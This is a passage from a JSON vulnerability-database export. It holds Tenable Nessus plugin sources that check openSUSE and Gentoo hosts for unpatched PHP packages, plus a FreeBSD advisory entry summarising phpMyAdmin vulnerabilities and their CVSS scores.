"p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-zlib", "cpe:/o:novell:opensuse:11.2"], "id": "SUSE_11_2_APACHE2-MOD_PHP5-100813.NASL", "href": "https://www.tenable.com/plugins/nessus/49210", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-2929.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49210);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0397\", \"CVE-2010-1860\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0599-1)\");\n script_summary(english:\"Check for the apache2-mod_php5-2929 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP was updated to version 5.3.3 to fix serveral security issues.\n\n(CVE-2010-0397, CVE-2010-1860, CVE-2010-1862, CVE-2010-1864,\nCVE-2010-1866, CVE-2010-1914, CVE-2010-1915, CVE-2010-1917,\nCVE-2010-2093, CVE-2010-2094, CVE-2010-2097, CVE-2010-2100,\nCVE-2010-2101, CVE-2010-2190, CVE-2010-2191, CVE-2010-2225,\nCVE-2010-2531, CVE-2010-2950, CVE-2010-3062, CVE-2010-3063,\nCVE-2010-3064, CVE-2010-3065)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=588975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=605097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=605100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609766\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=616232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619483\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619489\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=633932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=633934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=636923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-09/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"apache2-mod_php5-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-bcmath-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-bz2-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-calendar-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-ctype-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-curl-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-dba-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-devel-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-dom-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-enchant-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-exif-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-fastcgi-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-fileinfo-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-ftp-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-gd-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-gettext-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-gmp-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-hash-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-iconv-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-imap-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-intl-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-json-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-ldap-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-mbstring-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-mcrypt-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-mysql-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-odbc-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-openssl-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-pcntl-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-pdo-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-pear-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-pgsql-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-phar-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-posix-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-pspell-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-readline-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-shmop-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-snmp-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-soap-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-sockets-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-sqlite-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-suhosin-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-sysvmsg-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-sysvsem-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-sysvshm-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-tidy-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-tokenizer-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-wddx-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-xmlreader-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-xmlrpc-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-xmlwriter-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-xsl-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-zip-5.3.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"php5-zlib-5.3.3-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:46:01", "description": "The remote host is affected by the vulnerability described in GLSA-201110-06 (PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A context-dependent attacker could execute arbitrary code, obtain sensitive information from process memory, bypass intended access restrictions, or cause a Denial of Service in various ways.\n A remote attacker could cause a Denial of Service in various ways, bypass spam detections, or bypass open_basedir restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2011-10-12T00:00:00", "type": "nessus", "title": "GLSA-201110-06 : PHP: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-7243", "CVE-2009-5016", "CVE-2010-1128", "CVE-2010-1129", "CVE-2010-1130", "CVE-2010-1860", "CVE-2010-1861", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1866", "CVE-2010-1868", "CVE-2010-1914", "CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065", "CVE-2010-3436", "CVE-2010-3709", "CVE-2010-3710", "CVE-2010-3870", "CVE-2010-4150", "CVE-2010-4409", "CVE-2010-4645", "CVE-2010-4697", "CVE-2010-4698", "CVE-2010-4699", "CVE-2010-4700", "CVE-2011-0420", "CVE-2011-0421", "CVE-2011-0708", "CVE-2011-0752", "CVE-2011-0753", "CVE-2011-0755", "CVE-2011-1092", "CVE-2011-1148", "CVE-2011-1153", "CVE-2011-1464", "CVE-2011-1466", "CVE-2011-1467", "CVE-2011-1468", "CVE-2011-1469", "CVE-2011-1470", "CVE-2011-1471", "CVE-2011-1657", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-3189", "CVE-2011-3267", "CVE-2011-3268"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:php", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201110-06.NASL", "href": "https://www.tenable.com/plugins/nessus/56459", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-06.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56459);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-7243\", \"CVE-2009-5016\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1860\", \"CVE-2010-1861\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\", \"CVE-2010-3436\", \"CVE-2010-3709\", \"CVE-2010-3710\", \"CVE-2010-3870\", \"CVE-2010-4150\", \"CVE-2010-4409\", \"CVE-2010-4645\", \"CVE-2010-4697\", \"CVE-2010-4698\", \"CVE-2010-4699\", \"CVE-2010-4700\", \"CVE-2011-0420\", \"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-0752\", \"CVE-2011-0753\", \"CVE-2011-0755\", \"CVE-2011-1092\", \"CVE-2011-1148\", \"CVE-2011-1153\", \"CVE-2011-1464\", \"CVE-2011-1466\", \"CVE-2011-1467\", \"CVE-2011-1468\", \"CVE-2011-1469\", \"CVE-2011-1470\", \"CVE-2011-1471\", \"CVE-2011-1657\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3189\", \"CVE-2011-3267\", \"CVE-2011-3268\");\n script_xref(name:\"GLSA\", value:\"201110-06\");\n\n script_name(english:\"GLSA-201110-06 : PHP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201110-06\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A context-dependent attacker could execute arbitrary code, obtain\n sensitive information from process memory, bypass intended access\n restrictions, or cause a Denial of Service in various ways.\n A remote attacker could cause a Denial of Service in various ways,\n bypass spam detections, or bypass open_basedir restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201110-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.3.8'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/php\", unaffected:make_list(\"ge 5.3.8\"), vulnerable:make_list(\"lt 5.3.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2023-12-02T16:48:26", "description": "\n\nThe phpMyAdmin development team reports:\n\nIt was possible to manipulate the PHP session superglobal using\n\t some of the Swekey authentication code. This could open a path\n\t for other attacks.\n\n\nAn unsanitized key from the Servers array is written in a comment\n\t of the generated config. An attacker can modify this key by\n\t modifying the SESSION superglobal array. This allows the attacker\n\t to close the comment and inject code.\n\n\nThrough a possible bug in PHP running on Windows systems a NULL\n\t byte can truncate the pattern string allowing an attacker to\n\t inject the /e modifier causing the preg_replace function to\n\t execute its second argument as PHP code.\n\n\nFixed filtering of a file path in the MIME-type transformation\n\t code, which allowed for directory traversal.\n\n\n", "cvss3": {}, "published": "2011-07-02T00:00:00", "type": "freebsd", "title": "phpmyadmin -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2011-07-28T00:00:00", "id": "7E4E5C53-A56C-11E0-B180-00216AA06FC2", "href": "https://vuxml.freebsd.org/freebsd/7e4e5c53-a56c-11e0-b180-00216aa06fc2.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-06-28T06:36:12", "description": "\nSeveral remote vulnerabilities have been discovered in PHP\u00a05, an hypertext\npreprocessor.\nThe Common Vulnerabilities and Exposures project identifies the following\nproblems:\n\n\n* [CVE-2010-1917](https://security-tracker.debian.org/tracker/CVE-2010-1917)\nThe 